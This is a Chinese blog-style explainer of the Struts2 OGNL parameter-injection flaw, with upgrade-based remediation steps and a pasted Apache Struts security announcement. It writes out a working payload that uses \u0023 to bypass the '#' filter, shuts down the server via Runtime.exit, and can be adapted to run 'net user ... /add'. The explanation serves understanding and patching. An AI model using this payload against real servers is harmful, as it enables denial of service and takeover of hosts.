struts2漏洞原理及解决办法

漏洞由来已久，2012年9月13日发表的如下帖子

http://www.2cto.com/Article/201209/154990.html

1、原理

Struts2的核心是使用的webwork框架，处理 action时通过调用底层的getter/setter方法来处理http的参数，它将每个http参数声明为一个ONGL（这里是ONGL的介绍）语句。当我们提交一个http参数：

?user.address.city=Bishkek&user['favoriteDrink']=kumys 
ONGL将它转换为：
action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys") 

这是通过ParametersInterceptor（参数过滤器）来执行的，使用用户提供的HTTP参数调用 ValueStack.setValue()。 www.2cto.com

为了防范篡改服务器端对象，XWork的ParametersInterceptor不允许参数名中出现“#”字符，但如果使用了Java的 unicode字符串表示\u0023，攻击者就可以绕过保护，修改保护Java方式执行的值：

 

此处代码有破坏性，请在测试环境执行，严禁用此种方法进行恶意攻击
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 

 

转义后是这样：

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

 

OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exit(1);  //关闭程序，即将web程序关闭

类似的可以执行
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户，在有权限的情况下能成功（在URL中用%20替换空格，%2F替换/）
只要有权限就可以执行任何DOS命令。

2、解决方法
网上很多文章都介绍了三种解决方法，个人觉得将struts2的jar包更新到最新版本最简单，不用更改任何程序代码，目前最新版本2.3.4
下载到的更新包中有很多jar包，我系统中主要用到以下几个替换掉旧版本的：
commons-lang3-3.1.jar        (保留commons-lang-2.6.jar)
javassist-3.11.0.GA.jar        (新加包)
ognl-3.0.5.jar            (替换旧版本)
struts2-core-2.3.4.1.jar    (替换旧版本)
xwork-core-2.3.4.1.jar        (替换旧版本)

最新版struts2已经解决这个问题

http://struts.apache.org/announce.html

Announcements

Skip to: Announcements - 2012

16 July 2013 - Struts 2.3.15.1 General Availability Release - Security Fix Release

The Apache Struts group is pleased to announce that Struts 2.3.15.1 is available as a "General Availability" release. The GA designation is our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating enterprise-ready Java web applications. The framework is designed to streamline the full development cycle, from building, to deploying, to maintaining applications over time.

Two security issues were solved with this release:

• S2-016 - Remote code execution vulnerability when using short-circuit navigation parameter prefixes
• S2-017 - Open redirect vulnerability when using short-circuit redirect parameter prefixes

All developers are strongly advised to update existing Struts 2 applications to Struts 2.3.15.1.

Struts 2.3.15.1 is available in a full distribution or as separate library, source, example and documentation distributions, from thereleases page. The release is also available through the central Maven repository under Group ID "org.apache.struts". Therelease notes are available online.

The 2.3.x series of the Apache Struts framework has a minimum requirement of the following specification versions: Servlet API 2.4, JSP API 2.0, and Java 5.

Should any issues arise with your use of any version of the Struts framework, please post your comments to the user list, and, if appropriate, file a tracking ticket.